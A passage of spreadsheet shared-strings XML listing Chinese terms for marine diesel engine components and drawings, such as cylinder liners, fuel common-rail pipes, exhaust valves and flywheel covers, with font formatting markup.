        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器主污水排水管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>机架门</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸压力监测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸压缩空间</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>压缩垫片</t>
  </si>
  <si>
    <t>压缩弹簧</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>系统设计指导</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形插座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>连接单元</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰连接件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>连杆</t>
  </si>
  <si>
    <t>连杆安装图</t>
  </si>
  <si>
    <t>连接支管</t>
  </si>
  <si>
    <t>曲轴连接</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>连接套</t>
  </si>
  <si>
    <t>连接管</t>
  </si>
  <si>
    <t>控制空气管路</t>
  </si>
  <si>
    <t>控制空气气源</t>
  </si>
  <si>
    <t>控制空气气源布置</t>
  </si>
  <si>
    <t>控制空气气源进口</t>
  </si>
  <si>
    <t>控制箱</t>
  </si>
  <si>
    <t>机旁操纵台控制箱支架</t>
  </si>
  <si>
    <t>控制电缆</t>
  </si>
  <si>
    <t>控制图</t>
  </si>
  <si>
    <t>控制型线</t>
  </si>
  <si>
    <t>控制说明</t>
  </si>
  <si>
    <t>控制阀</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全模块原理图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>控制插件</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水排水管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水进口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>缸套冷却水进水总管</t>
  </si>
  <si>
    <t>冷却水系统</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>电线</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>联接螺栓</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>接头螺母</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t/>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖吊装板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖和吊板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>盖板</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊车轨道</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>曲柄</t>
  </si>
  <si>
    <t>曲柄角度标识</t>
  </si>
  <si>
    <t>曲轴角度传感器单元</t>
  </si>
  <si>
    <t>曲轴安装图</t>
  </si>
  <si>
    <t>曲轴加工图</t>
  </si>
  <si>
    <t>十字头销</t>
  </si>
  <si>
    <t>十字头/滑块组件</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弧线进油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>气缸冷却水出口管</t>
  </si>
  <si>
    <t>气缸润滑油管</t>
  </si>
  <si>
    <t>两半式油缸</t>
  </si>
  <si>
    <t>气缸体安装件</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸冷却水浸水管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸冷却水管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>气缸盖</t>
  </si>
  <si>
    <t>半油缸</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>缸套</t>
  </si>
  <si>
    <t>缸套定位销组</t>
  </si>
  <si>
    <t>气缸油管</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸油进油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>阻尼器</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震器检测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阻尼件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>DENIS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>空气管系图</t>
  </si>
  <si>
    <t>冷却水管系图</t>
  </si>
  <si>
    <t>汽缸滑油系统图</t>
  </si>
  <si>
    <t>燃油管系图</t>
  </si>
  <si>
    <t>滑油系统图</t>
  </si>
  <si>
    <t>清洗装置原理图</t>
  </si>
  <si>
    <t>压差计</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压差开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>蝶簧</t>
  </si>
  <si>
    <t>盘车机离合装置</t>
  </si>
  <si>
    <t>拨叉</t>
  </si>
  <si>
    <t>封头</t>
  </si>
  <si>
    <t>活塞/缸套拆卸尺寸图</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆解和安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>贯穿螺栓拆卸尺寸图</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>定距环</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距滚子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>燃油</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>不带螺旋桨时的系泊试验</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工字钢</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>双向止回阀</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>排放管</t>
  </si>
  <si>
    <t>排放螺钉</t>
  </si>
  <si>
    <t>排气阀</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排水管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>供油单元驱动</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>双重过滤器</t>
  </si>
  <si>
    <t>接地装置</t>
  </si>
  <si>
    <t>弹性螺栓</t>
  </si>
  <si>
    <t>弹性螺钉</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性螺柱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>电路图</t>
  </si>
  <si>
    <t>电源供给电气图</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>托架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>输出端罩壳</t>
  </si>
  <si>
    <t>自由端罩壳</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端部法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>端块</t>
  </si>
  <si>
    <t>终点挡板</t>
  </si>
  <si>
    <t>主机校中</t>
  </si>
  <si>
    <t>主机装配记录</t>
  </si>
  <si>
    <t>柴油机控制系统图</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机连接飞轮外壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮罩壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机横剖图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>机架安装件</t>
  </si>
  <si>
    <t>主机纵剖图</t>
  </si>
  <si>
    <t>主机底座</t>
  </si>
  <si>
    <t>止推块</t>
  </si>
  <si>
    <t>主机顶撑</t>
  </si>
  <si>
    <t>环氧树脂</t>
  </si>
  <si>
    <t>新供应商认可</t>
  </si>
  <si>
    <t>排气管</t>
  </si>
  <si>
    <t>排气管安装件</t>
  </si>
  <si>
    <t>排气阀控制单元</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>翻转工作台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>排气阀阀杆</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀膨胀接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>膨胀水柜</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="134"/>
      </rPr>
      <t>防爆灯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>拉簧</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊耳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏斗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>填隙片</t>
  </si>
  <si>
    <t>滤器</t>
  </si>
  <si>
    <t>滤器支架</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤网</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>过滤器系统</t>
  </si>
  <si>
    <t>灭火管路</t>
  </si>
  <si>
    <t>首次生产认可</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装和拆卸工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>安装说明</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>阻焰器</t>
  </si>
  <si>
    <t>管束</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆形法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>阀片</t>
  </si>
  <si>
    <t>FLEX电控部件</t>
  </si>
  <si>
    <r>
      <t>FLEX</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>FLEX</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部系统说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>浮子控制</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>浮动开关壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量探测器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>流体流速表</t>
  </si>
  <si>
    <t>飞轮</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮护盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮轮廓图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>脚板</t>
  </si>
  <si>
    <t>拨叉杆</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拨叉杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前卡套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>材料规范</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷射阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>燃油进油管</t>
  </si>
  <si>
    <t>燃油泄放监测</t>
  </si>
  <si>
    <r>
      <t>ICU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄露管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>燃油泄漏油回油总管</t>
  </si>
  <si>
    <t>共轨单元燃油泄放管</t>
  </si>
  <si>
    <t>燃油系统</t>
  </si>
  <si>
    <t>燃油出口管</t>
  </si>
  <si>
    <t>燃油回油管</t>
  </si>
  <si>
    <t>燃油管</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油高压油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>燃油泵</t>
  </si>
  <si>
    <t>燃油促动泵</t>
  </si>
  <si>
    <t>燃油泵柱塞</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油油量传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>燃油共轨</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄漏回流管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>漏斗</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
